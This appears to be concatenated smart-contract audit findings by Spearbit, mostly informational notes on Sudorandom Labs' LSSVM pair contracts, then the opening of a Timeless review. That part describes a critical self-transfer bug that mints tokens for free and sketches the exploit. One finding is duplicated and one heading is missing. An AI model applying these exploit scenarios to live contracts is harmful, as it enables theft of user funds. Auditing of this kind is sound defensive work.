Context: LSSVMPairETH.sol#L139, RoyaltyEngine.sol#L53, RoyaltyEngine.sol#L165, RoyaltyEngine.sol#L172, RoyaltyEngine.sol#L192, RoyaltyEngine.sol#L215, RoyaltyEngine.sol#L222, RoyaltyEngine.sol#L229, RoyaltyEngine.sol#L253, RoyaltyEngine.sol#L259, RoyaltyEngine.sol#L280, RoyaltyEngine.sol#L286, RoyaltyEngine.sol#L304
Description: require statements should include meaningful error messages to help with monitoring the system.
Recommendation: Consider adding a descriptive reason in an error string / custom error.
Sudorandom Labs: Acknowledged, no change.
Spearbit: Acknowledged.
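A worked version of the 5.5.10 numbers, using the closed form quoted in the team's response: with spotPrice = delta = 100 and numItems = 2, the first item sells for 100, the second for 0, and the total is 100:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract LinearSellMathSketch {
        function outputValue(uint256 spotPrice, uint256 delta, uint256 numItems)
            external
            pure
            returns (uint256)
        {
            // For the PoC inputs: 2 * 100 - (2 * 1 * 100) / 2 = 100
            return numItems * spotPrice - (numItems * (numItems - 1) * delta) / 2;
        }
    }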
+5.5.14 Prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20()
Severity: Informational
Context: LSSVMPairFactory.sol#L650-L676
Description: The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 tokens to a pair, but they do not update the prices and balances in the curves. If they were to do so, the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect deposits; the owner can't fully rely on the emitted events.
Recommendation: Consider making the functions onlyOwner for the pair owner.
Sudorandom Labs: The only curve at the moment which cares about balances is the XYK curve, which uses virtual balances (and doesn't read from state), so anyone depositing into a pool wouldn't affect pricing. Adding onlyOwner wouldn't stop people from directly calling transferFrom anyway. The intended procedure for pool owners who want to modify their pool pricing for an XYK curve with respect to additional deposited funds is to either modify the price first and then deposit funds, or deposit funds first and then modify the price. In general, as depositing funds is going to increase the reserves (and thus decrease the slippage), the recommended procedure would be to deposit the additional funds first and then update the virtual reserves.
Spearbit: Acknowledged.
+5.5.15 Functions enableSettingsForPair() and disableSettingsForPair() can be simplified
Severity: Informational
Context: LSSVMPairFactory.sol#L501-L524
Description: The functions enableSettingsForPair() and disableSettingsForPair() define a temporary variable pair. This variable could also be used earlier in the code to simplify it.
    function enableSettingsForPair(address settings, address pairAddress) public {
        require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address");
        LSSVMPair pair = LSSVMPair(pairAddress);
        ...
    }
    function disableSettingsForPair(address settings, address pairAddress) public {
        require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address");
        ...
        LSSVMPair pair = LSSVMPair(pairAddress);
        ...
    }
Recommendation: Consider changing the code to:
    + LSSVMPair pair = LSSVMPair(pairAddress);
    - require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address");
    + require(isPair(pairAddress, pair.pairVariant()), "Invalid pair address");
      ...
    - LSSVMPair pair = LSSVMPair(pairAddress);
Sudorandom Labs: This is no longer an issue because we refactored isPair to take in an address now.
Spearbit: Verified. Now isValidPair() checks whether the provided address is a valid pair without the need to cast the address to a LSSVMPair, unlike what isPair() needed.
+5.5.16 Design asymmetry decreases code readability
Severity: Informational
Context: LSSVMPair.sol#L1
Description: The function _calculateBuyInfoAndUpdatePoolParams() performs the check on maxExpectedTokenInput inside the function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function:
    function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol
        ...
        (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...);
        require(outputAmount >= minExpectedTokenOutput, "Out too few tokens");
        ...
    }
The asymmetry in the design of these functions affects code readability and may confuse the reader.
Recommendation: Implementing the aforementioned checks in a more symmetric manner yields cleaner code.
Sudorandom Labs: Solved in PR#76.
Spearbit: Verified that this is fixed by PR#76.
+5.5.17 Providing the same _nftId multiple times will increase numPairNFTsWithdrawn multiple times and potentially cause confusion
Severity: Informational
Context: LSSVMPairERC1155.sol#L285
Description: If one accidentally (or intentionally) supplies the same id == _nftId multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading.
Recommendation: A potential solution is to add a break once an occurrence of _nftId has been found. This also saves some gas:
      for (uint256 i; i < numNFTs;) {
          if (ids[i] == _nftId) {
              numPairNFTsWithdrawn += amounts[i];
    +         break;
          }
          unchecked { ++i; }
      }
      if (numPairNFTsWithdrawn != 0) {
          // only emit for the pair's NFT
          emit NFTWithdrawal(numPairNFTsWithdrawn);
      }
Sudorandom Labs: This does change the behavior of the function: in theory a user could pass in ids [1, 1, 1] and amounts [10, 20, 30], and we'd expect the batchTransfer to transfer 60 tokens. We're OK skipping this change.
Spearbit: Acknowledged.
+5.5.18 Dual interface NFTs may cause unexpected behavior if not considered in future
Severity: Informational
Context: LSSVMPairCloner.sol#L90-L94, LSSVMPairCloner.sol#L341-L345
Description: Some NFTs support both the ERC721 and the ERC1155 standard, for example the NFTs of the Sandbox project. Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair is very similar:
| cloneETHPair | cloneERC1155ETHPair |
| --- | --- |
| mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) |
| mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) |
| mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) |
| mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) |
| mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) |
In case there is a specific function that only works on ERC721 and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, an unexpected situation could occur. Currently this is not the case, but it might occur in future iterations of the code.
Recommendation: Be aware of the risk while maintaining the code. If necessary, the type of NFT can be retrieved via supportsInterface(); by checking for both NFT types, an NFT supporting both standards can be detected (a sketch follows 5.5.20 below).
Sudorandom Labs: Acknowledged.
Spearbit: Acknowledged.
+5.5.19 Missing event emission in multicall
Severity: Informational
Context: LSSVMPair.sol#L653-L663
Description: Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. Several actions should always emit events for transparency, such as ownership changes and transfers of ether/tokens. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls.
Recommendation: Consider emitting an event after each succeeding/failing call of multicall.
Sudorandom Labs: Acknowledged, no change at this time.
Spearbit: Acknowledged.
+5.5.20 Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() could be misleading
Severity: Informational
Context: LSSVMPair.sol#L206-L266
Description: The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() return a protocolFee variable. There are also other fees, like tradeFee and royaltyTotal, that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why the other fees are not included.
Recommendation: Double-check the usefulness of the protocolFee return value. If it is never used, it could be removed. If it is used from the outside, it might be useful to also return tradeFee and royaltyTotal, or the sum of all fees.
Sudorandom Labs: Acknowledged, no change for now. Users can call calculateRoyaltiesView or use the tradeFee to calculate the values they need from pairs of interest.
Spearbit: Acknowledged.
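For 5.5.18, a sketch of detecting a dual-interface NFT via ERC165; the interface IDs are the standard ERC721 and ERC1155 values, and the helper contract is illustrative:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IERC165 {
        function supportsInterface(bytes4 interfaceId) external view returns (bool);
    }

    contract DualInterfaceCheckSketch {
        bytes4 internal constant ERC721_ID = 0x80ac58cd;
        bytes4 internal constant ERC1155_ID = 0xd9b67a26;

        function isDualInterface(address nft) external view returns (bool) {
            // NFTs such as Sandbox assets report support for both standards.
            return IERC165(nft).supportsInterface(ERC721_ID)
                && IERC165(nft).supportsInterface(ERC1155_ID);
        }
    }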
+5.5.20 Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuote- WithRoyalties() could be misleading Severity: Informational Context: LSSVMPair.sol#L206-L266 Description: The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() re- turn a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here. Recommendation: Double-check the usefulness of the protocolFee variable. If it is never used it could be removed. If it is used from the outside, then it might be useful to also add tradeFee and royaltyTotal, or return the sum of all fees. Sudorandom Labs: Acknowledged, no change for now. Users can call calculateRoyaltiesView or use the tradeFee to calculate values they need from pairs of interest. Spearbit: Acknowledged. 50 +5.5.21 Two ways to query the assetRecipient could be confusing Severity: Informational Context: LSSVMPair.sol#L77, LSSVMPair.sol#L315-L328 Description: The contract LSSVMPair has two ways to query the assetRecipient. On via the getter assetRecip- ient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient } Recommendation: Change the variable assetRecipient to internal. This way no getter function is generated. Sudorandom Labs: Solved in PR#62 and PR#84. Spearbit: Verified that this is fixed by PR#62 and PR#84. +5.5.22 Functions expecting NFT deposits can validate parameters for sanity and optimization Severity: Informational Context: LSSVMPairFactory.sol#L603-L621, LSSVMPairFactory.sol#L623-L645 Description: Functions expecting NFT deposits in their typical flows can validate parameters for sanity and opti- mization. Recommendation: Add _initialNFTBalance != 0 to prevent empty transfers in _nft.safeTransferFrom() Sudorandom Labs: Solved in PR#49. Spearbit: Verified that this is fixed in PR#49. +5.5.23 Functions expecting ETH deposits can check msg.value for sanity and optimization Severity: Informational Context: LSSVMPairFactory.sol#L547-L571, LSSVMPairFactory.sol#L603-L621 Description: Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization. Recommendation: Add msg.value > 0 checks. Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79. 51 +5.5.24 LSSVMPairs can be simplified Severity: Informational Context: ERC721ERC20.sol#L18, LSSVMPairERC721ETH.sol#L18 LSSVMPairERC1155ERC20.sol#L19, LSSVMPairERC1155ETH.sol#L18, LSSVMPair- Description: At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVM- Pair, which could store them as immutable. Then functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code. Recommendation: Consider passing the values to LSSVMPair in the constructor and move the functions pair- Variant() and _immutableParamsLength() to LSSVMPair. For example, at LSSVMPairERC1155ERC20.sol#L19: - constructor(IRoyaltyEngineV1 royaltyEngine) LSSVMPair(royaltyEngine) {} + constructor(IRoyaltyEngineV1 royaltyEngine) ,! 
+5.5.24 LSSVMPairs can be simplified
Severity: Informational
Context: LSSVMPairERC721ETH.sol#L18, LSSVMPairERC721ERC20.sol#L18, LSSVMPairERC1155ETH.sol#L18, LSSVMPairERC1155ERC20.sol#L19
Description: In the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVMPair, which could store them as immutable. The functions pairVariant() and _immutableParamsLength() could then also be moved to LSSVMPair, which would simplify the code.
Recommendation: Consider passing the values to LSSVMPair in the constructor and moving the functions pairVariant() and _immutableParamsLength() to LSSVMPair. For example, at LSSVMPairERC1155ERC20.sol#L19:
    - constructor(IRoyaltyEngineV1 royaltyEngine) LSSVMPair(royaltyEngine) {}
    + constructor(IRoyaltyEngineV1 royaltyEngine) LSSVMPair(ILSSVMPairFactoryLike.PairVariant.ERC1155_ERC20, 133, royaltyEngine) {}
Sudorandom Labs: Good suggestion. Acknowledged, no change for now.
Spearbit: Acknowledged.
+5.5.25 Unused values in catch can be avoided for better readability
Severity: Informational
Context: StandardSettings.sol#L137
Description: Employing a catch clause with more verbosity than needed may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error; if the error data is of no interest, one can use a simple catch statement without error data.
Recommendation: Consider removing the unused argument of the catch statement for clarity. See below:
      try pairFactory.enableSettingsForPair(address(this), msg.sender) {}
    - catch (bytes memory) {
    + catch {
          revert("Pair verification failed");
      }
Sudorandom Labs: Solved in PR#72.
Spearbit: Verified that this is solved by PR#72.
+5.5.26 Stale constant and comments reduce readability
Severity: Informational
Context: RoyaltyEngine.sol#L35, RoyaltyEngine.sol#L146
Description: This logic was added ~2 years ago, when the spec enum was changed to int16. Based on the comments, and given that the original contract was upgradeable, it was expected that new unconfigured specs with negative IDs could be added between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as NOT_CONFIGURED.
    // Anything > NONE and <= NOT_CONFIGURED is considered not configured
    int16 private constant NONE = -1;
    int16 private constant NOT_CONFIGURED = 0;
Recommendation: Logic and comments that consider value > NONE && value <= NOT_CONFIGURED can be refactored to value <= NOT_CONFIGURED.
Sudorandom Labs: Solved in PR#72.
Spearbit: Verified that this is fixed by PR#72.
+5.5.27 Different MAX_FEE value and comments in different places is misleading
Severity: Informational
Context: LSSVMPairFactory.sol#L46, LSSVMPair.sol#L46-L47
Description: The same MAX_FEE constant is declared in different files with different values, while comments indicate that these values should be the same.
    // 50%, must be <= 1 - MAX_PROTOCOL_FEE (set in LSSVMPairFactory)
    uint256 internal constant MAX_FEE = 0.5e18;

    uint256 internal constant MAX_PROTOCOL_FEE = 0.1e18; // 10%, must be <= 1 - MAX_FEE
Recommendation: Fix the inconsistency between the comments/values in the two files.
Sudorandom Labs: Solved in PR#79 and PR#92.
Spearbit: Verified that this is fixed by PR#79 and PR#92.
+5.5.28 Events without indexed event parameters make it harder/inefficient for off-chain tools
Severity: Informational
Context: PropertyCheckerFactory.sol#L11-L12, LSSVMPair.sol#L83-L94, LSSVMPairFactory.sol#L72-L80
Description: Indexed event fields make events quickly accessible to off-chain tools that parse them. Note, however, that each indexed field costs extra gas during emission, so it is not necessarily best to index the maximum allowed per event (three fields).
Recommendation: Consider which event parameters could be particularly useful for off-chain tools and index them (a sketch follows below).
Sudorandom Labs: Solved in PR#74.
Spearbit: Verified that this is fixed by PR#74.
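A sketch of the indexing suggested in 5.5.28; the event shapes are illustrative, not the pair's actual events:
    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    contract IndexedEventsSketch {
        // Before: no indexed fields, so consumers must decode every log.
        event FeeUpdateLoose(address pair, uint96 newFee);

        // After: the pair address becomes a topic, so off-chain tools can
        // filter logs by pair without decoding the data section.
        event FeeUpdate(address indexed pair, uint96 newFee);
    }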
+5.5.29 Some functions included in LSSVMPair are not found in ILSSVMPair.sol and ILSSVMPairFactoryLike.sol
Severity: Informational
Context: ILSSVMPair.sol#L10
Description: The LSSVMPair contract defines the following functions, which are missing from the interface ILSSVMPair:
    ROYALTY_ENGINE()
    spotPrice()
    delta()
    assetRecipient()
    pairVariant()
    factory()
    swapNFTsForToken() (2 versions)
    swapTokenForSpecificNFTs()
    getSellNFTQuoteWithRoyalties()
    call()
    withdrawERC1155()
Recommendation: Consider including the above functions in the interface ILSSVMPair so that other contracts can import the interface and use them.
Sudorandom Labs: Acknowledged.
Spearbit: Acknowledged.
– LSSVMPairERC721.sol#L268, LSSVMPair.sol#L559, LSSVMPair.sol#L566 should be onlyOwner not onlyOwnable. – LSSVMRouter.sol#L61-L68: "The Unix timestamp (in seconds) at/after which the swap will revert" should be replaced by "The Unix timestamp (in seconds) after which the swap will revert". • Missing comment – cloneERC1155ETHPair, cloneERC1155ERC20Pair are missing a Total length comment like the ones found at cloneETHPair() and cloneERC20Pair(). – ExponentialCurve.sol#L24: other contracts have a comment about the unused variable name. For example: function validateSpotPrice(uint128 /*newSpotPrice*/ ) external pure override returns (bool) {. • Misplaced comment – ReentrancyGuard.sol#L3: comment is related to Ownable, not to ReentrancyGuard. – MerklePropertyChecker.sol#L12: comment not relevant (copy/paste from RangePropertyChecker). – StandardSettings.sol#L239: comments describing what the variables are would make more sense placed between the commas. • @inheritdoc can be used for inherited Natspec – LinearCurve.sol#L15, LinearCurve.sol#L23, LinearCurve.sol#L31, LinearCurve.sol#L96, ExponentialCurve.sol#L15, ExponentialCurve.sol#L22, ExponentialCurve.sol#L29, ExponentialCurve.sol#L96, XykCurve.sol#L24, XykCurve.sol#L32, XykCurve.sol#L40, XykCurve.sol#L91 can use @inheritdoc ICurve. Sudorandom Labs: Acknowledged, some larger ones addressed in PR#82, the rest are acked but not changed. Spearbit: Acknowledged.
+5.5.31 MAX_SETTABLE_FEE value does not follow a standard notation Severity: Informational Context: StandardSettings.sol#L22 Description: The protocol establishes several constant hard-coded MAX_FEE-like variables across different contracts. The percentages expressed in those variables should be declared in a standard way all over the codebase. In StandardSettings.sol#L22, the standard followed by the rest of the codebase is not respected. Not respecting the standard notation may confuse the reader. Recommendation: Consider adopting a standard notation for fee amounts in the codebase. For example, set 100% as 1e18, 99% as 0.99e18 and so on. - uint96 constant MAX_SETTABLE_FEE = 2e17; // Max fee of 20% + uint96 constant MAX_SETTABLE_FEE = 0.2e18; // Max fee of 20% Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79.
+5.5.32 No modifier for __Ownable_init Severity: Informational Context: OwnableWithTransferCallback.sol#L24-L26 Description: Usually __Ownable_init also has a modifier like initializer or onlyInitializing, see OwnableUpgradeable.sol#L29. The version in OwnableWithTransferCallback.sol doesn't have this. It is not strictly necessary as the function is internal, but it is more robust if it does. function __Ownable_init(address initialOwner) internal { _owner = initialOwner; } Recommendation: Consider adding a modifier like initializer to __Ownable_init(). Sudorandom Labs: Acknowledged, no change as the function is internal. Spearbit: Acknowledged.
+5.5.33 Wrong value of seconds in year slightly affects precision Severity: Informational Context: StandardSettingsFactory.sol#L12 Description: The calculation of ONE_YEAR_SECS takes leap years into account, looking for the most exact precision. However, as can be seen at NASA and stackoverflow, the value is slightly different.
Current case: 365.2425 days = 31_556_952 / (24 * 3600) NASA case: 365.2422 days = 31_556_926 / (24 * 3600) Recommendation: Use 31_556_926 in ONE_YEAR_SECS for maximum precision. Sudorandom Labs: Solved in PR#79. Spearbit: Verified that this is fixed by PR#79.
+5.5.34 Missing idempotent checks may be added for consistency Severity: Informational Context: LSSVMPairFactory.sol#L409-L413, LSSVMPairFactory.sol#L419-L423, LSSVMPairFactory.sol#L430-L433, StandardSettings.sol#L79-L81 Description: Setter functions could check if the value being set is the same as the variable's existing value, to avoid doing a state variable write in such scenarios; they could also revert to flag potentially mismatched offchain-onchain states. While this is done in many places, there are a few setters missing this check. Recommendation: Add idempotent checks and consider reverting when the same value is being set. Sudorandom Labs: Acknowledged, no change. Spearbit: Acknowledged.
+5.5.35 Missing events affect transparency and monitoring Severity: Informational Context: LSSVMPair.sol#L640-L645, LSSVMPairFactory.sol#L485-L492, LSSVMPairFactory.sol#L501-L508, LSSVMPairFactory.sol#L517-L524, LSSVMPairERC1155.sol#L257-L265, LSSVMPairERC1155.sol#L273-L301, LSSVMPairERC721.sol#L272-L284, LSSVMPairERC721.sol#L292-L300, LSSVMPairETH.sol#L113-L118, LSSVMPairETH.sol#L121-L123, LSSVMPairERC20.sol#L140-L147 Description: Missing events in critical functions, especially privileged ones, reduce transparency and ease of monitoring. Users may be surprised by changes effected by such functions without being able to observe related events. Recommendation: Add appropriate events to emit in critical/privileged functions. Sudorandom Labs: Acknowledged, Settings enable/disable event now tracked in PR#86, but not other changes. Spearbit: Acknowledged.
+5.5.36 Wrong error returned affects debugging and off-chain monitoring Severity: Informational Context: XykCurve.sol#L71 Description: Error.INVALID_NUMITEMS is declared for the 0 case, but is returned twice in the same function: first for numItems == 0 and second for numItems >= nftBalance. This can make it hard to know why it is failing. Recommendation: Define a new error type for this case and use it accordingly. enum Error { OK, // No error INVALID_NUMITEMS, // The numItem value is 0 - SPOT_PRICE_OVERFLOW // The updated spot price doesn't fit into 128 bits + SPOT_PRICE_OVERFLOW, // The updated spot price doesn't fit into 128 bits + TOO_MANY_NUMITEMS // The numItem >= nftBalance } Sudorandom Labs: Acknowledged, no change. Spearbit: Acknowledged.
+5.5.37 Functions can be renamed for clarity and consistency Severity: Informational Context: LSSVMPairCloner.sol#L22, LSSVMPairCloner.sol#L112 Description: Since both functions cloneETHPair() and cloneERC20Pair() use IERC721 nft as a parameter, renaming them to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively makes it clearer that the functions process ERC721 tokens. This also provides consistency in the naming of functions, considering that there is already a function cloneERC1155ETHPair() using this nomenclature. Recommendation: Consider renaming cloneETHPair() and cloneERC20Pair() to cloneERC721ETHPair() and cloneERC721ERC20Pair() respectively. Sudorandom Labs: Addressed in PR#82. Spearbit: Verified that this is fixed by PR#82.
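A minimal sketch of the idempotency pattern recommended in 5.5.34 above; the contract, variable and event names are illustrative and not taken from the audited codebase:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract IdempotentSetterSketch {
    error ValueAlreadySet();

    uint96 public protocolFee;

    event ProtocolFeeUpdated(uint96 newFee);

    // Reverts when the caller passes the value that is already stored,
    // avoiding a redundant SSTORE and flagging a potentially mismatched
    // offchain-onchain state (access control omitted for brevity).
    function setProtocolFee(uint96 newFee) external {
        if (newFee == protocolFee) revert ValueAlreadySet();
        protocolFee = newFee;
        emit ProtocolFeeUpdated(newFee);
    }
}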
+5.5.38 Two events TokenDeposit() with different parameters Severity: Informational Context: LSSVMPairFactory.sol#L74, LSSVMPair.sol#L88 Description: The event TokenDeposit() of LSSVMPairFactory has an address parameter while the event TokenDeposit() of LSSVMPair has a uint256 parameter. This might be confusing. contract LSSVMPairFactory { ... event TokenDeposit(address poolAddress); ... } abstract contract LSSVMPair ... { ... event TokenDeposit(uint256 amount); ... } Recommendation: Consider renaming one of the event names or expanding the events to both include address and amount. Sudorandom Labs: Solved in PR#81. Spearbit: Verified that this is fixed by PR#81.
+5.5.39 Unused imports affect readability Severity: Informational Context: XykCurve.sol#L4-L13, LSSVMPairERC20.sol#L4-L13, LSSVMPairETH.sol#L4-L11 Description: The following imports are unused in • XykCurve.sol import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {LSSVMPair} from "../LSSVMPair.sol"; import {LSSVMPairERC20} from "../LSSVMPairERC20.sol"; import {LSSVMPairCloner} from "../lib/LSSVMPairCloner.sol"; import {ILSSVMPairFactoryLike} from "../LSSVMPairFactory.sol"; • LSSVMPairERC20.sol import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {ICurve} from "./bonding-curves/ICurve.sol"; import {CurveErrorCodes} from "./bonding-curves/CurveErrorCodes.sol"; • LSSVMPairETH.sol import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol"; import {ICurve} from "./bonding-curves/ICurve.sol"; Recommendation: Remove the unused imports. Sudorandom Labs: Solved in PR#76. Spearbit: Verified that this is fixed by PR#76.
+5.5.40 Use of isPair() is not intuitive Severity: Informational Context: LSSVMPairFactory.sol#L309-L322 Description: There are two use cases for isPair(): 1) To check if the contract is a pair of any of the 4 types. Here the type is always retrieved via pairVariant(). 2) To check if a pair is ETH / ERC20 / ERC721 / ERC1155. Each of these values is represented by two different pair types. Using isPair() this way is not intuitive, and some errors have been made in the code where only one value is tested. Note: also see issue "pairTransferERC20From only supports ERC721 NFTs". Function isPair() could be refactored to make the code easier to read and maintain. function isPair(address potentialPair, PairVariant variant) public view override returns (bool) { ... } These are the occurrences of use case 1: LSSVMPairFactory.sol: require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), "Invalid pair address"); (two occurrences) LSSVMPairFactory.sol: if (isPair(recipient, LSSVMPair(recipient).pairVariant())) { LSSVMPairERC20.sol: router.pairTransferERC20From(..., pairVariant()); (three occurrences) erc721/LSSVMPairERC721.sol: router.pairTransferNFTFrom(..., pairVariant()); (two occurrences) erc1155/LSSVMPairERC1155.sol: router.pairTransferERC1155From(..., pairVariant()); // router and VeryFastRouter interaction, which first queries pairVariant() function pairTransferERC20From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), "Not pair"); ...
} function pairTransferNFTFrom(..., ILSSVMPairFactoryLike.PairVariant variant) ... { require(factory.isPair(msg.sender, variant), "Not pair"); ... } function pairTransferERC1155From(..., ILSSVMPairFactoryLike.PairVariant variant) ... { ... require(factory.isPair(msg.sender, variant), "Not pair"); ... } These are the occurrences of use case 2: LSSVMPairFactory.sol: (isPair(...ERC721_ERC20) || isPair(...ERC1155_ERC20)) StandardSettings.sol: ...isPair(...ERC721_ETH) || ...isPair(...ERC1155_ETH) StandardSettings.sol: ...isPair(...ERC721_ERC20) || ...isPair(...ERC1155_ERC20) StandardSettings.sol: ...isPair(...ERC721_ETH) || ...isPair(...ERC1155_ETH) StandardSettings.sol: ...isPair(...ERC721_ERC20) || ...isPair(...ERC1155_ERC20) Recommendation: Consider creating two (possibly overloaded) versions of isPair(), dedicated to the two use cases. This could be something like: enum PoolTypeSelect { ETH, ERC20, ERC721, ERC1155 } function isPair(address potentialPair) // use case 1 function isPair(address potentialPair, PoolTypeSelect toCheck) // use case 2 Sudorandom Labs: Solved in PR#30. Spearbit: Verified that this is fixed by PR#30.
+5.5.41 Royalty related code spread across different contracts affects readability Severity: Informational Context: LSSVMPairFactory.sol#L330-L377, RoyaltyEngine.sol Description: The contract LSSVMPairFactory contains the function authAllowedForToken(), which has a lot of interactions with external contracts related to royalties. The code is rather similar to code that is present in the RoyaltyEngine contract. Combining this code in the RoyaltyEngine contract would make the code cleaner and easier to read. Recommendation: Consider moving the function authAllowedForToken() to the RoyaltyEngine contract. Sudorandom Labs: Acknowledged, though no change at the moment. Moving it to the Engine itself would incur additional gas for the CALL, as the authAllowed functions are only used for the PairFactory. So this is a gas trade-off we are willing to make in exchange for scattering the logic. Spearbit: Acknowledged.
diff --git a/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..548b694
--- /dev/null
+++ b/findings_newupdate/spearbit/Timeless-Spearbit-Security-Review.txt
@@ -0,0 +1,24 @@
+5.1.1 Mint PerpetualYieldTokens for free by self-transfer Severity: Critical Risk Context: PerpetualYieldToken.sol#L53 Description: The PYT.transfer and transferFrom functions operate on cached balance values. When transferring tokens to oneself, the decreased balance is overwritten by an increased balance, which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: • Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). • balanceOf[msg.sender] is first set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling A's balance. Recommendation: Fix the issue in transfer and transferFrom by operating on the latest storage balances instead of cached values. Timeless: Would checking for self-transfers and doing an early return be the best way to solve it? It would nevertheless be best regarding gas efficiency. Spearbit: It should still trigger a gate.beforePerpetualYieldTokenTransfer call once to accrue the yield, because the user would expect any transfer to accrue yields for from and to, and maybe someone is reliant on this. Additionally, it should also trigger the Transfer event for ERC20 compliance. Timeless: Not sure about triggering gate.beforePerpetualYieldTokenTransfer during self transfers, seems like a niche use case. Spearbit: Then its behavior is inconsistent. Because self-transfers are a niche use case anyway, might as well do the additional call to make it consistent. It would not increase gas cost per execution for non-self-transfer calls as you need the if branch + return anyway. Timeless: Implemented in PR #4. Spearbit: The bug still exists in transferFrom after PR #4. You're checking msg.sender != to but it should be from != to in this case - you always want to check the balance owners. The test should be with a spender different from from, with all three parties tested. Timeless: Nice catch, fixed in this commit. Spearbit: Acknowledged. 5.2 High Risk
+5.2.1 xPYT auto-compound does not take pounder reward into account Severity: High Risk Context: xPYT.sol#L179 Description: Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs an ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs an ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the first four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it as sweep computes the difference between these two values. 2. The xPYT exchange ratio is wrongly updated and withdrawers can redeem xPYT for more assets than they should, until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity, i.e. pounderReward = pytCompounded. • Vault total: 1k assets, 1k shares total supply. • pound with 100% fee: – claims Y PYT/NYT. – swaps Y NYT to X xPYT. – redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in example). – assetBalance is increased by claimed Y PYT. – pounder receives a pounder reward of X + Y PYT but does not decrease assetBalance by pounder reward X+Y. • Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. • Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although pounder receives 100% of pounding rewards, the xPYT price (assets / shares) increased. Recommendation: The assetBalance should also decrease by the pounderReward. - assetBalance += yieldAmount; - unchecked { ... } + // using unchecked should still be fine? as pounderReward <= yieldAmount + pytAmountRedeemed, and pytAmountRedeemed must have already been in the contract because of the implicit `redeem`, i.e., assetBalance >= pytAmountRedeemed + assetBalance = assetBalance + yieldAmount - pounderReward; Consider adding a test that verifies correct assetBalance updates. Timeless: Implemented in PR #2. Spearbit: Acknowledged.
+5.2.2 Wrong yield accumulation in claimYieldAndEnter Severity: High Risk Context: Gate.sol#L590 Description: The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specified.
